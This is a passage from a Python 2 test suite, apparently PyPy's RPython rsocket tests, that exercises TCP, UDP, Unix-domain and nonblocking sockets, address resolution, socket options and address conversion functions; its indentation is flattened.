assert addr2.eq(s1.getpeername())
s1.send('?')
print 'sent one character'
buf = s2.recv(100)
assert buf == '?'
print 'received ok'
def sendstuff():
s2.sendall('x'*50000)
rthread.start_new_thread(sendstuff, ())
buf = ''
while len(buf) < 50000:
data = s1.recv(50100)
print 'recv returned %d bytes' % (len(data,))
assert data
buf += data
assert buf == 'x'*50000
print 'data received ok'
s1.shutdown(SHUT_RDWR)
s1.close()
s2.close()
def test_simple_udp():
s1 = RSocket(AF_INET, SOCK_DGRAM)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
s1.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(s1.getsockname())
s2 = RSocket(AF_INET, SOCK_DGRAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
s2.bind(INETAddress('127.0.0.1', INADDR_ANY))
addr2 = s2.getsockname()
s1.sendto('?', 1, 0, addr2)
buf = s2.recv(100)
assert buf == '?'
s2.connect(addr)
count = s2.send('x'*99)
assert 1 <= count <= 99
buf, addr3 = s1.recvfrom(100)
assert buf == 'x'*count
print addr2, addr3
assert addr2.get_port() == addr3.get_port()
s1.close()
s2.close()
def test_nonblocking():
sock = RSocket()
sock.setblocking(False)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
err = py.test.raises(CSocketError, sock.accept)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.setblocking(False)
err = py.test.raises(CSocketError, s2.connect, addr)
assert err.value.errno in (errno.EINPROGRESS, errno.EWOULDBLOCK)
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
s1.setblocking(False)
assert addr.eq(s2.getpeername())
assert addr2.get_port() == s2.getsockname().get_port()
assert addr2.eq(s1.getpeername())
err = s2.connect_ex(addr) # should now work
assert err in (0, errno.EISCONN)
s1.send('?')
import time
time.sleep(0.01) # Windows needs some time to transfer data
buf = s2.recv(100)
assert buf == '?'
err = py.test.raises(CSocketError, s1.recv, 5000)
assert err.value.errno in (errno.EAGAIN, errno.EWOULDBLOCK)
count = s2.send('x'*50000)
assert 1 <= count <= 50000
while count: # Recv may return less than requested
buf = s1.recv(count + 100)
assert len(buf) <= count
assert buf.count('x') == len(buf)
count -= len(buf)
# Check that everything has been read
err = py.test.raises(CSocketError, s1.recv, 5000)
s1.close()
s2.close()
def test_inheritable():
for inh in [False, True]:
s1 = RSocket(inheritable=inh)
assert sock_get_inheritable(s1.fd) == inh
s1.close()
def test_getaddrinfo_http():
lst = getaddrinfo('localhost', 'http')
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if (family == AF_INET and
socktype == SOCK_STREAM and
addr.get_host() == '127.0.0.1' and
addr.get_port() == 80):
found = True
assert found, lst
# The following might fail if the DNS redirects failed requests to a
# catch-all address (i.e. opendns).
e = py.test.raises(GAIError, getaddrinfo, 'www.very-invalidaddress.com', None)
assert isinstance(e.value.get_msg(), str)
assert isinstance(e.value.get_msg_unicode(), unicode)
def getaddrinfo_pydotorg(i, result):
lst = getaddrinfo('python.org', None)
assert isinstance(lst, list)
found = False
for family, socktype, protocol, canonname, addr in lst:
if addr.get_host() in ('104.130.43.121', '23.253.135.79'):
found = True
elif family == AF_INET:
print 'pydotorg changed to', addr.get_host()
result[i] += found
def test_getaddrinfo_pydotorg():
result = [0,]
getaddrinfo_pydotorg(0, result)
assert result[0] == 1
def test_getaddrinfo_no_reverse_lookup():
# It seems that getaddrinfo never runs a reverse lookup on Linux.
# Python2.3 on Windows returns the hostname.
lst = getaddrinfo('82.94.164.162', None, flags=AI_NUMERICHOST)
assert isinstance(lst, list)
found = False
print lst
for family, socktype, protocol, canonname, addr in lst:
assert 'python.org' not in canonname
if addr.get_host() == '82.94.164.162':
found = True
assert found, lst
def test_getaddrinfo_osx_crash():
# see CPython issue17269
for port in [None, '0', '00']:
getaddrinfo('localhost', port, 0, 0, 0, AI_NUMERICSERV)
def test_connect_ex():
s = RSocket()
err = s.connect_ex(INETAddress('0.0.0.0', 0)) # should not work
assert err in (errno.ECONNREFUSED, errno.EADDRNOTAVAIL)
s.close()
def test_connect_with_timeout_fail():
s = RSocket()
s.settimeout(0.1)
with py.test.raises(SocketTimeout):
s.connect(INETAddress('172.30.172.30', 12345))
s.close()
def test_connect_with_timeout_succeed():
s = RSocket()
s.settimeout(10.0)
s.connect(INETAddress('python.org', 80))
s.close()
def test_getsetsockopt():
import struct
assert struct.calcsize("i") == rffi.sizeof(rffi.INT)
# A socket sould start with reuse == 0
s = RSocket(AF_INET, SOCK_STREAM)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse == 0
s.setsockopt_int(SOL_SOCKET, SO_REUSEADDR, 1)
reuse = s.getsockopt_int(SOL_SOCKET, SO_REUSEADDR)
assert reuse != 0
# Test string case
s = RSocket(AF_INET, SOCK_STREAM)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value == 0
optstr = struct.pack("i", 1)
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, optstr)
reusestr = s.getsockopt(SOL_SOCKET, SO_REUSEADDR, rffi.sizeof(rffi.INT))
value, = struct.unpack("i", reusestr)
assert value != 0
def test_dup():
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
if sys.platform == "win32":
assert not hasattr(s, 'dup')
return
s2 = s.dup()
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_c_dup():
# rsocket.dup() duplicates fd, it also works on Windows
# (but only on socket handles!)
s = RSocket(AF_INET, SOCK_STREAM)
try:
s.bind(INETAddress('localhost', 50007))
s2 = RSocket(fd=dup(s.fd))
try:
assert s.fd != s2.fd
assert s.getsockname().eq(s2.getsockname())
finally:
s2.close()
finally:
s.close()
def test_inet_aton():
assert inet_aton('1.2.3.4') == '\x01\x02\x03\x04'
assert inet_aton('127.0.0.1') == '\x7f\x00\x00\x01'
tests = ["127.0.0.256", "127.0.0.255555555555555555", "127.2b.0.0",
"127.2.0.0.1", "127.2.0."]
for ip in tests:
py.test.raises(SocketError, inet_aton, ip)
# Windows 2000: missing numbers are replaced by 0
for ip, aton in [("11..22.33", '\x0b\x00\x16\x21'),
(".11.22.33", '\x00\x0b\x16\x21')]:
try:
assert inet_aton(ip) == aton
except SocketError:
pass
def test_inet_ntoa():
assert inet_ntoa('\x01\x02\x03\x04') == '1.2.3.4'
def test_inet_pton():
if not hasattr(rsocket, 'inet_pton'):
py.test.skip("no inet_pton()")
assert inet_pton(AF_INET, '1.2.3.5') == '\x01\x02\x03\x05'
py.test.raises(SocketError, inet_pton, AF_INET, '127.0.0.256')
def test_inet_ntop():
if not hasattr(rsocket, 'inet_ntop'):
py.test.skip("no inet_ntop()")
assert inet_ntop(AF_INET, '\x01\x02\x03\x05') == '1.2.3.5'
def test_unix_socket_connect():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
from rpython.tool.udir import udir
sockpath = str(udir.join('test_unix_socket_connect'))
a = UNIXAddress(sockpath)
serversock = RSocket(AF_UNIX)
serversock.bind(a)
serversock.listen(1)
clientsock = RSocket(AF_UNIX)
clientsock.connect(a)
fd, addr = serversock.accept()
s = RSocket(AF_UNIX, fd=fd)
s.send('X')
data = clientsock.recv(100)
assert data == 'X'
clientsock.send('Y')
data = s.recv(100)
assert data == 'Y'
clientsock.close()
s.close()
class TestTCP:
PORT = 50007
HOST = 'localhost'
def setup_method(self, method):
self.serv = RSocket(AF_INET, SOCK_STREAM)
self.serv.bind(INETAddress(self.HOST, self.PORT))
self.serv.listen(1)
def teardown_method(self, method):
self.serv.close()
self.serv = None
def test_timeout(self):
def raise_timeout():
self.serv.settimeout(1.0)
self.serv.accept()
py.test.raises(SocketTimeout, raise_timeout)
def test_timeout_zero(self):
def raise_error():
self.serv.settimeout(0.0)
foo = self.serv.accept()
py.test.raises(SocketError, raise_error)
def _test_cond_include(cond):
# Test that _rsocket_rffi is importable even on platforms where
# AF_PACKET or AF_NETLINK is not defined.
import re
from rpython.rlib import _rsocket_rffi
srcfile = _rsocket_rffi.__file__
if srcfile.lower().endswith('c') or srcfile.lower().endswith('o'):
srcfile = srcfile[:-1] # .pyc => .py
assert srcfile.lower().endswith('.py')
sourcelines = open(srcfile, 'rb').read().splitlines()
found = False
for i, line in enumerate(sourcelines):
line2 = re.sub(r"(\s*COND_HEADER\s*=)",
r"\1'#undef %s\\n'+" % cond,
line)
if line2 != line:
found = True
sourcelines[i] = line2
assert found
d = {}
sourcelines.append('')
exec '\n'.join(sourcelines) in d
def test_no_AF_PACKET():
_test_cond_include('AF_PACKET')
def test_no_AF_NETLINK():
_test_cond_include('AF_NETLINK')
def test_thread_safe_gethostbyaddr():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
ip = '8.8.8.8'
domain = gethostbyaddr(ip)[0]
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_addr(ip, i):
name, aliases, address_list = gethostbyaddr(ip, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_addr, args=[ip, i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_thread_safe_gethostbyname_ex():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
domain = 'google.com'
result = [0] * nthreads
threads = [None] * nthreads
lock = threading.Lock()
def lookup_name(i):
name, aliases, address_list = gethostbyname_ex(domain, lock)
if name == domain:
result[i] += 1
for i in range(nthreads):
threads[i] = threading.Thread(target = lookup_name, args=[i])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_getaddrinfo_pydotorg_threadsafe():
py.test.skip("hits non-thread-safe issues with ll2ctypes")
import threading
nthreads = 10
result = [0] * nthreads
threads = [None] * nthreads
for i in range(nthreads):
threads[i] = threading.Thread(target = getaddrinfo_pydotorg, args=[i, result])
threads[i].start()
for i in range(nthreads):
threads[i].join()
assert sum(result) == nthreads
def test_translate_netdb_lock():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [])
assert fc() == 0
def test_translate_netdb_lock_thread():
def f():
rsocket_startup()
gethostbyaddr("localhost")
return 0
fc = compile(f, [], thread=True)
assert fc() == 0
def test_socket_saves_errno(tmpdir):
# ensure errno is set to a known value...
unconnected_sock = RSocket()
e = py.test.raises(CSocketError, unconnected_sock.recv, 1024)
# ...which is ENOTCONN
assert e.value.errno == errno.ENOTCONN
e = py.test.raises(CSocketError,
RSocket,
family=AF_INET, type=SOCK_STREAM, proto=SOL_UDP)
assert e.value.errno in (errno.EPROTOTYPE, errno.EPROTONOSUPPORT)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.